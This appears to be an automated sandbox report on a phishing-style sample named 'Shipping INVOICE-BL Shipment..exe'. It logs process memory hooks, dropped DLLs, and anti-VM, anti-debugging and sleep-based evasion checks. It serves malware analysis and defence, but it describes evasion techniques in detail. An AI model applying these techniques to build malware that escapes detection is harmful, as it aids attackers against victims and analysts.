Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 7711EFD0 value: E9 26 5B 00 00	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 6360 base: 77165050 value: E9 EB 61 FB FF	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 6360 base: 771650F0 value: E9 5B 61 FB FF	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 6360 base: 77165180 value: E9 9B 60 FB FF	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 6360 base: 77165190 value: E9 CB 60 FB FF	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 6360 base: 771651A0 value: E9 4B 60 FB FF	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 6360 base: 7717FEE0 value: E9 9B FF FF FF	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 6360 base: 771133C0 value: E9 FB 6F 00 00	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 6360 base: 77114760 value: E9 2B 6B 00 00	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 6360 base: 770D6590 value: E9 0B 00 00 00	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 6360 base: 770DB510 value: E9 2B 53 00 00	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 6360 base: 770FC490 value: E9 0B 00 00 00	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 6360 base: 7711EE00 value: E9 E1 52 00 00	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 6360 base: 7711EFD0 value: E9 26 5B 00 00	Jump to behavior

Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Source: C:\Windows\SysWOW64\cmd.exe	RDTSC instruction interceptor: First address: 00000000004085C4 second address: 00000000004085CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmd.exe	RDTSC instruction interceptor: First address: 000000000040894E second address: 0000000000408954 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe	RDTSC instruction interceptor: First address: 0000000002F685C4 second address: 0000000002F685CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe	RDTSC instruction interceptor: First address: 0000000002F6894E second address: 0000000002F68954 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Contains capabilities to detect virtual machines

Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 2_2_00408880 rdtsc

2_2_00408880

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3\phplive\DevCfgUI.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\medium\listadmin\glance_config\eDbgJitUI.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\fckeditor\makecert.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\special_offers\dirb\123\dbsvcui.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\manage\mms\crtowordses.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3\phplive\MSBuildFramework.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\panel\box\xbox\msvsotbcct.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\pkgs\rcxditui.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\pkgs\vjscsvr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3\phplive\guidgen.exe	Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\cmd.exe TID: 5796	Thread sleep time: -190000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6744	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe TID: 2928	Thread sleep time: -42000s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\netsh.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\netsh.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	Code function: 0_2_00406469 FindFirstFileA,FindClose,	0_2_00406469
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	Code function: 0_2_00402765 FindFirstFileA,	0_2_00402765
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	Code function: 0_2_0040592E CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_0040592E

Source: explorer.exe, 00000004.00000002.923295424.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000004.00000000.709985267.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000002.923834797.0000000006650000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.709985267.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.701787722.0000000004710000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000004.00000002.923295424.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000004.00000000.710156984.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000004.00000002.923295424.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000004.00000000.710616810.000000000A9CC000.00000004.00000001.sdmp	Binary or memory string: SI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI
Source: explorer.exe, 00000004.00000000.710247999.000000000A784000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: explorer.exe, 00000004.00000002.923295424.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\SysWOW64\rundll32.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Checks if the current process is being debugged

Source: C:\Windows\SysWOW64\cmd.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process queried: DebugPort			Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 2_2_00408880 rdtsc

2_2_00408880

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 2_2_00409AF0 LdrLoadDll,

2_2_00409AF0

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 1_2_10004CBC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

1_2_10004CBC

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\rundll32.exe

1_2_1000734B

Contains functionality to read the PEB

Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04C08CD6 mov eax, dword ptr fs:[00000030h]	2_2_04C08CD6
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BF14FB mov eax, dword ptr fs:[00000030h]	2_2_04BF14FB
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B6BC2C mov eax, dword ptr fs:[00000030h]	2_2_04B6BC2C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]	2_2_04BF1C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]	2_2_04BF1C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]	2_2_04BF1C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]	2_2_04BF1C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]	2_2_04BF1C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]	2_2_04BF1C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]	2_2_04BF1C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]	2_2_04BF1C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]	2_2_04BF1C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]	2_2_04BF1C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]	2_2_04BF1C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]	2_2_04BF1C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]	2_2_04BF1C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]	2_2_04BF1C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04C0740D mov eax, dword ptr fs:[00000030h]	2_2_04C0740D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04C0740D mov eax, dword ptr fs:[00000030h]	2_2_04C0740D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04C0740D mov eax, dword ptr fs:[00000030h]	2_2_04C0740D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B5746D mov eax, dword ptr fs:[00000030h]	2_2_04B5746D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B635A1 mov eax, dword ptr fs:[00000030h]	2_2_04B635A1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B32D8A mov eax, dword ptr fs:[00000030h]	2_2_04B32D8A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B32D8A mov eax, dword ptr fs:[00000030h]	2_2_04B32D8A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B32D8A mov eax, dword ptr fs:[00000030h]	2_2_04B32D8A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B32D8A mov eax, dword ptr fs:[00000030h]	2_2_04B32D8A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B32D8A mov eax, dword ptr fs:[00000030h]	2_2_04B32D8A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BE8DF1 mov eax, dword ptr fs:[00000030h]	2_2_04BE8DF1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B3AD30 mov eax, dword ptr fs:[00000030h]	2_2_04B3AD30
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B5C577 mov eax, dword ptr fs:[00000030h]	2_2_04B5C577
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B5C577 mov eax, dword ptr fs:[00000030h]	2_2_04B5C577
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B57D50 mov eax, dword ptr fs:[00000030h]	2_2_04B57D50
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04C08D34 mov eax, dword ptr fs:[00000030h]	2_2_04C08D34
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B73D43 mov eax, dword ptr fs:[00000030h]	2_2_04B73D43
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04C08ED6 mov eax, dword ptr fs:[00000030h]	2_2_04C08ED6
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BB46A7 mov eax, dword ptr fs:[00000030h]	2_2_04BB46A7
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BCFE87 mov eax, dword ptr fs:[00000030h]	2_2_04BCFE87
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B616E0 mov ecx, dword ptr fs:[00000030h]	2_2_04B616E0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04C00EA5 mov eax, dword ptr fs:[00000030h]	2_2_04C00EA5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04C00EA5 mov eax, dword ptr fs:[00000030h]	2_2_04C00EA5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04C00EA5 mov eax, dword ptr fs:[00000030h]	2_2_04C00EA5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B636CC mov eax, dword ptr fs:[00000030h]	2_2_04B636CC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BEFEC0 mov eax, dword ptr fs:[00000030h]	2_2_04BEFEC0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BEFE3F mov eax, dword ptr fs:[00000030h]	2_2_04BEFE3F
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B6E730 mov eax, dword ptr fs:[00000030h]	2_2_04B6E730
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B34F2E mov eax, dword ptr fs:[00000030h]	2_2_04B34F2E
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B34F2E mov eax, dword ptr fs:[00000030h]	2_2_04B34F2E
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04C08F6A mov eax, dword ptr fs:[00000030h]	2_2_04C08F6A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BCFF10 mov eax, dword ptr fs:[00000030h]	2_2_04BCFF10
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BCFF10 mov eax, dword ptr fs:[00000030h]	2_2_04BCFF10
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04C0070D mov eax, dword ptr fs:[00000030h]	2_2_04C0070D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04C0070D mov eax, dword ptr fs:[00000030h]	2_2_04C0070D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B4EF40 mov eax, dword ptr fs:[00000030h]	2_2_04B4EF40
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B6F0BF mov ecx, dword ptr fs:[00000030h]	2_2_04B6F0BF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B6F0BF mov eax, dword ptr fs:[00000030h]	2_2_04B6F0BF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B6F0BF mov eax, dword ptr fs:[00000030h]	2_2_04B6F0BF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B790AF mov eax, dword ptr fs:[00000030h]	2_2_04B790AF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B39080 mov eax, dword ptr fs:[00000030h]	2_2_04B39080
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B4B02A mov eax, dword ptr fs:[00000030h]	2_2_04B4B02A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B4B02A mov eax, dword ptr fs:[00000030h]	2_2_04B4B02A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B4B02A mov eax, dword ptr fs:[00000030h]	2_2_04B4B02A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B4B02A mov eax, dword ptr fs:[00000030h]	2_2_04B4B02A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BB7016 mov eax, dword ptr fs:[00000030h]	2_2_04BB7016
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BB7016 mov eax, dword ptr fs:[00000030h]	2_2_04BB7016
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BB7016 mov eax, dword ptr fs:[00000030h]	2_2_04BB7016
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04C01074 mov eax, dword ptr fs:[00000030h]	2_2_04C01074
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BF2073 mov eax, dword ptr fs:[00000030h]	2_2_04BF2073
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B6A185 mov eax, dword ptr fs:[00000030h]	2_2_04B6A185
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B5C182 mov eax, dword ptr fs:[00000030h]	2_2_04B5C182
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B3B1E1 mov eax, dword ptr fs:[00000030h]	2_2_04B3B1E1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B3B1E1 mov eax, dword ptr fs:[00000030h]	2_2_04B3B1E1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B3B1E1 mov eax, dword ptr fs:[00000030h]	2_2_04B3B1E1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B54120 mov eax, dword ptr fs:[00000030h]	2_2_04B54120
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B54120 mov eax, dword ptr fs:[00000030h]	2_2_04B54120
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B54120 mov eax, dword ptr fs:[00000030h]	2_2_04B54120
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B54120 mov eax, dword ptr fs:[00000030h]	2_2_04B54120
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B54120 mov ecx, dword ptr fs:[00000030h]	2_2_04B54120
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B39100 mov eax, dword ptr fs:[00000030h]	2_2_04B39100
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B39100 mov eax, dword ptr fs:[00000030h]	2_2_04B39100
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B39100 mov eax, dword ptr fs:[00000030h]	2_2_04B39100
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B3B171 mov eax, dword ptr fs:[00000030h]	2_2_04B3B171
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B3B171 mov eax, dword ptr fs:[00000030h]	2_2_04B3B171
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B5B944 mov eax, dword ptr fs:[00000030h]	2_2_04B5B944
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B5B944 mov eax, dword ptr fs:[00000030h]	2_2_04B5B944
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B352A5 mov eax, dword ptr fs:[00000030h]	2_2_04B352A5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B352A5 mov eax, dword ptr fs:[00000030h]	2_2_04B352A5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B352A5 mov eax, dword ptr fs:[00000030h]	2_2_04B352A5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B352A5 mov eax, dword ptr fs:[00000030h]	2_2_04B352A5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B352A5 mov eax, dword ptr fs:[00000030h]	2_2_04B352A5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B6D294 mov eax, dword ptr fs:[00000030h]	2_2_04B6D294
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B6D294 mov eax, dword ptr fs:[00000030h]	2_2_04B6D294
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BEB260 mov eax, dword ptr fs:[00000030h]	2_2_04BEB260
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BEB260 mov eax, dword ptr fs:[00000030h]	2_2_04BEB260
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B39240 mov eax, dword ptr fs:[00000030h]	2_2_04B39240
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B39240 mov eax, dword ptr fs:[00000030h]	2_2_04B39240
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B39240 mov eax, dword ptr fs:[00000030h]	2_2_04B39240
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B39240 mov eax, dword ptr fs:[00000030h]	2_2_04B39240
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BF138A mov eax, dword ptr fs:[00000030h]	2_2_04BF138A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04C05BA5 mov eax, dword ptr fs:[00000030h]	2_2_04C05BA5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04C08B58 mov eax, dword ptr fs:[00000030h]	2_2_04C08B58
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BF131B mov eax, dword ptr fs:[00000030h]	2_2_04BF131B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_00800000 mov eax, dword ptr fs:[00000030h]	2_2_00800000
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_00800CE4 mov edi, dword ptr fs:[00000030h]	2_2_00800CE4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_00802C5D mov eax, dword ptr fs:[00000030h]	2_2_00802C5D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_00804E70 mov eax, dword ptr fs:[00000030h]	2_2_00804E70
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03733B7A mov eax, dword ptr fs:[00000030h]	9_2_03733B7A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03733B7A mov eax, dword ptr fs:[00000030h]	9_2_03733B7A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0370DB60 mov ecx, dword ptr fs:[00000030h]	9_2_0370DB60
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D8B58 mov eax, dword ptr fs:[00000030h]	9_2_037D8B58
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0370F358 mov eax, dword ptr fs:[00000030h]	9_2_0370F358
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0370DB40 mov eax, dword ptr fs:[00000030h]	9_2_0370DB40
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C131B mov eax, dword ptr fs:[00000030h]	9_2_037C131B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]	9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]	9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]	9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]	9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]	9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]	9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]	9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]	9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]	9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]	9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]	9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]	9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]	9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]	9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]	9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]	9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]	9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]	9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]	9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]	9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]	9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037303E2 mov eax, dword ptr fs:[00000030h]	9_2_037303E2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037303E2 mov eax, dword ptr fs:[00000030h]	9_2_037303E2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037303E2 mov eax, dword ptr fs:[00000030h]	9_2_037303E2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037303E2 mov eax, dword ptr fs:[00000030h]	9_2_037303E2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037303E2 mov eax, dword ptr fs:[00000030h]	9_2_037303E2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037303E2 mov eax, dword ptr fs:[00000030h]	9_2_037303E2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037B23E3 mov ecx, dword ptr fs:[00000030h]	9_2_037B23E3
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037B23E3 mov ecx, dword ptr fs:[00000030h]	9_2_037B23E3
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037B23E3 mov eax, dword ptr fs:[00000030h]	9_2_037B23E3
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372DBE9 mov eax, dword ptr fs:[00000030h]	9_2_0372DBE9
